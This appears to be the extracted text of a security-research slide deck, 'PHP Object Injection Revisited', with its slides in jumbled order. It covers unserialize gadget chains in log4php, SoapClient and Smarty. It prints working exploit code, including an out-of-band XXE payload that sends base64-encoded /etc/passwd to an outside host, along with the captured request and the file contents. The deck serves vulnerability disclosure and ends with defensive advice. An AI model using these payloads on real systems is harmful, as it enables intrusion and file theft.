Introducing
Your new presentation assistant.
Refine, enhance, and tailor your content, source relevant images, and edit visuals quicker than ever before.
Trending searches
PHP Object Injection Revisited
214
PHP magic methods
__clone()
SOAP Call to api.php
SoapClient generates SoapFault exception
But if we use Out-of-band technique...
XXE will be triggered automagically!
Some new stuff
Examples
$host = 'localhost';
$port = 4242;
$server = Net_Server::create('sequential', $host, $port);
$handler = new Net_Server_Handler_Log();
$server->setCallbackObject($handler);
$server->start();
vBulletin 5
log4php
http://logging.apache.org/log4php/
class Net_Server_Handler_Log extends Net_Server_Handler {
private $hierarchy;
function onStart() {
$this->hierarchy = Logger::getRootLogger();
}
function onReceiveData($clientId = 0, $data = "") {
$events = $this->getEvents($data);
foreach($events as $event) {
$root = $this->hierarchy->getRootLogger();
if($event->getLoggerName() === 'root') {
$root->callAppenders($event);
} else {
$loggers = $this->hierarchy->getCurrentLoggers();
foreach($loggers as $logger) {
$root->callAppenders($event);
$appenders = $logger->getAllAppenders();
foreach($appenders as $appender) {
$appender->doAppend($event);
}
}
}
}
}
function getEvents($data) {
if (preg_match('/^<log4php:event/', $data)) {
throw new Exception("Please use 'log4php.appender.default.useXml = false' in appender_socket.properties file!");
}
preg_match('/^(O:\d+)/', $data, $parts);
$events = split($parts[1], $data);
array_shift($events);
$size = count($events);
for($i=0; $i<$size; $i++) {
$events[$i] = unserialize($parts[1].$events[$i]);
}
return $events;
}
}
Let's use PHP classes instead!
appender_console.php
appender_dailyfile.php
appender_echo.php
appender_file.php
appender_mailevent.php
appender_mail.php
appender_mongodb.php
appender_null.php
appender_pdo.php
appender_php.php
appender_rollingfile.php
appender_socket.php
appender_socket_server.php
appender_syslog.php
cache.php
configurator_basic.php
configurator_php.php
configurator_xml.php
filter_denyall.php
filter_levelmatch.php
filter_levelrange.php
filter_stringmatch.php
layout_html.php
layout_pattern.php
layout_simple.php
layout_ttcc.php
layout_xml.php
mdc.php
ndc.php
renderer_default.php
renderer_map.php
simple.php
Thanks!
- core
- libraries
- log4php
- examples (no 403!)
Questions?
PHP Object Injection Revisited
Arseny Reutov
me@raz0r.name @ru_raz0r
- used by CMS Made Simple , SugarCRM, vtiger, etc
- contains handy "examples" dir
- vBulletin just cloned the repo leaving examples and did not protect it
No useful magic methods in log4php
But a method is called on unserialized object
So what?
Options
public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )
XSS
WSDL - Web Services Description Language
Get all the magic methods!
$event = new SoapClient(null, array('location' => 'http://raz0r.name/api.php', 'uri' => 'http://raz0r.name/'));
$event->getLoggerName();
WSDL mode
Non-WSDL mode
$wsdl = "http://somehost/api.wsdl"
$wsdl = null
Object survives serialization :)
Proper serialization is not implemented when SoapClient is initialized in WSDL mode :(
Exception::__toString
ErrorException::__toString
DateTime::__wakeup
DOMException::__toString
LogicException::__toString
BadFunctionCallException::__toString
BadMethodCallException::__toString
DomainException::__toString
InvalidArgumentException::__toString
LengthException::__toString
OutOfRangeException::__toString
RuntimeException::__toString
OutOfBoundsException::__toString
OverflowException::__toString
RangeException::__toString
UnderflowException::__toString
UnexpectedValueException::__toString
CachingIterator::__toString
RecursiveCachingIterator::__toString
SplFileInfo::__toString
DirectoryIterator::__toString
FilesystemIterator::__toString
RecursiveDirectoryIterator::__toString
GlobIterator::__toString
SplFileObject::__toString
SplTempFileObject::__toString
ReflectionException::__toString
ReflectionFunctionAbstract::__toString
ReflectionFunction::__toString
ReflectionParameter::__toString
ReflectionMethod::__toString
ReflectionClass::__toString
ReflectionObject::__toString
ReflectionProperty::__toString
ReflectionExtension::__toString
PharException::__toString
Phar::__destruct
Phar::__toString
PharData::__destruct
PharData::__toString
PharFileInfo::__destruct
PharFileInfo::__toString
SimpleXMLElement::__toString
SimpleXMLIterator::__toString
SoapClient::__call
SoapFault::__toString
mysqli_sql_exception::__toString
PDOException::__toString
PDO::__wakeup
PDOStatement::__wakeup
<?php
header("HTTP/1.0 404 <script>alert(1);</script>");
location
uri
style
use
soap_version
login
password
proxy_host
proxy_port
proxy_login
proxy_password
local_cert
passphrase
authentication
compression
encoding
trace
classmap
exceptions
connection_timeout
typemap
type_name
type_ns
from_xml
cache_wsdl
user_agent
stream_context
features
keep_alive
$classes = get_declared_classes();
foreach($classes as $class) {
$methods = get_class_methods($class);
foreach ($methods as $method) {
if (in_array($method, array(/* magic methods */))) {
print $class . '::' . $method . "\n";
}
}
}
__call() is triggered when invoking inaccessible methods in an object context
new SoapClient(null, array('location' => 'http://raz0r.name/api.php',
'uri' => 'http://raz0r.name/'));
Fatal error: Uncaught SoapFault exception: [HTTP] <script>alert(1);</script> in appender_socket_server.php:71
Does not filter anything
Arseny Reutov
$ whoami
Web application security researcher you have never
heard of
PHP hater since 2006
Casual CTF player, random bug bounties
participant, bla bla
me@raz0r.name @ru_raz0r
open_basedir bypass
XXE
Smarty!
$c = new SoapClient(null, array('uri'=>'http://raz0r.name/', 'location'=>'http://raz0r.name/xxe.xml'));
$c->getLoggerName();
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % a SYSTEM "http://bugsand.hol.es/3_deep?php://filter/read=convert.base64-encode/resource=/etc/passwd">
%a;
%intern;
%trick;
]>
Smarty_Internal_Template
SoapClient can cache WSDL files locally
public function __destruct()
{
if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
}
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:////etc/passwd">]>
class Smarty {
public $cache_locking = true;
}
class Smarty_Template_Cached {
public $is_locked = true;
public function __construct() {
$this->handler = new SoapClient(null, array(
'uri' =>'http://raz0r.name/',
'location' =>'http://raz0r.name/xxe.xml')
);
}
}
class Smarty_Internal_Template {
public function __construct() {
$this->smarty = new Smarty();
$this->cached = new Smarty_Template_Cached();
}
}
$c = serialize(new Smarty_Internal_Template());
ini_set('open_basedir', '/var/www/site/');
ini_set('soap.wsdl_cache_enabled', true);
ini_set('soap.wsdl_cache_dir', '/var/www/');
$c = new SoapClient('http://raz0r.name/test.wsdl', array('cache_wsdl' => WSDL_CACHE_DISK));
Fatal error: Uncaught SoapFault exception: [Client] DTD are not supported by SOAP
GET /result?cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L2Jpbi9zaAptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovYmluL3NoCmxwOng6Nzo3OmxwOi92YXIvc3Bvb2wvbHBkOi9iaW4vc2gKbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovYmluL3NoCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L2Jpbi9zaAp1dWNwOng6MTA6MTA6dXVjcDovdmFyL3Nwb29sL3V1Y3A6L2Jpbi9zaApwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L2Jpbi9zaAp3d3ctZGF0YTp4OjMzOjMzOnd3dy1kYXRhOi92YXIvd3d3Oi9iaW4vc2gKYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovYmluL3NoCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L2Jpbi9zaAppcmM6eDozOTozOTppcmNkOi92YXIvcnVuL2lyY2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApsaWJ1dWlkOng6MTAwOjEwMTo6L3Zhci9saWIvbGlidXVpZDovYmluL3NoCnN5c2xvZzp4OjEwMToxMDM6Oi9ob21lL3N5c2xvZzovYmluL2ZhbHNlCnNzaGQ6eDoxMDI6NjU1MzQ6Oi92YXIvcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4KbGFuZHNjYXBlOng6MTAzOjEwODo6L3Zhci9saWIvbGFuZHNjYXBlOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwNDoxMTI6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbXlzcWw6eDoxMDU6MTEzOjovdmFyL2xpYi9teXNxbDovYmluL2ZhbHNlCmF2YWhpOng6MTA2OjExNDo6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi9iaW4vZmFsc2UKc25vcnQ6eDoxMDc6MTE1OlNub3J0IElEUzovdmFyL2xvZy9zbm9ydDovYmluL2ZhbHNlCnN0YXRkOng6MTA4OjY1NTM0OjovdmFyL2xpYi9uZnM6L2Jpbi9mYWxzZQp1c2JtdXg6eDoxMDk6NDY6Oi9ob21lL3VzYm11eDovYmluL2ZhbHNlCnB1bHNlOng6MTEwOjExNjo6L3Zhci9ydW4vcHVsc2U6L2Jpbi9mYWxzZQpydGtpdDp4OjExMToxMTc6Oi9wcm9jOi9iaW4vZmFsc2UKZmVzdGl2YWw6eDoxMTI6Mjk6Oi9ob21lL2Zlc3RpdmFsOi9iaW4vZmFsc2UKcG9zdGdyZXM6eDoxMDAwOjEwMDA6Oi9ob21lL3Bvc3RncmVzOi9iaW4vc2gKcmF6MHI6eDoxMDAxOjEwMDE6LCwsOi9ob21lL3JhejByOi9iaW4vYmFzaApoYWxkYWVtb246eDoxMTM6MTIyOkhhcmR3YXJlIGFic3RyYWN0aW9uIGxheWVyLCwsOi92YXIvcnVuL2hhbGQ6L2Jpbi9mYWxzZQptb25nb2RiOng6MTE0OjY1NTM0OjovaG9tZS9tb25nb2RiOi9iaW4vZmFsc2UK
Host: bugsand.hol.es
Connection: close
open_basedir restriction in effect?
Nope!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
-rw------- 1 www-data www-data 530 2013-04-17 13:55 wsdl-raz0r-c7c3f5871a779534f433fa6fa878b92c
Kudos to Alexey Osipov and Timur Yunusov from Positive Technologies
Boring stuff
Some future stuff
But...
What about PHP?
Deserialize bugs in 2013, you kiddin?
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution (CVE 2012-5692)
What is actually
PHP Object Injection?
So we have unserialize...
What if a PHP framework is implemented
as a PHP extension?
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection
vulnerability (CVE-2013-1453)
The whole Phalcon class userspace is exposed to the users of shared hostings even if they do not use it
Actually still alive, just remember Ruby and YAML
(CVE 2013-0156, 0333)
No new concepts since "Shocking news in PHP exploitation" by Stefan Esser (2009)
Phalcon is a web framework implemented as a C extension
offering high performance and lower resource consumption.
CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection vulnerability (CVE-2013-1465)
all by Egidio Romano
__wakeup -> fopen -> __toString()
__wakeup()
class Foo {
public $bar = "baz";
}
CakePHP <= 1.3.5 / 1.2.8
__destruct
serialize()
O:3:"Foo":1:{s:3:"bar";s:3:"baz";}
So...
POST /
Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString
Why only __destruct and web app's classes?
Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString
do not unserialize user-supplied data!
__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
Vulnerable PHP Web Application
function __destruct() {
if ($this->__cache) {
$core = App::core('cake');
unset($this->__paths[rtrim($core[0], DS)]);
Cache::write('dir_map', array_filter($this->__paths),'_cake_core_');
Cache::write('file_map', array_filter($this->__map),'_cake_core_');
Cache::write('object_map', $this->__objects, '_cake_core_');
}
}
init any class and execute arbitrary methods
unserialize()
- Is called when object is freed, i.e. on script termination
- May contain dangerous code, when deserialized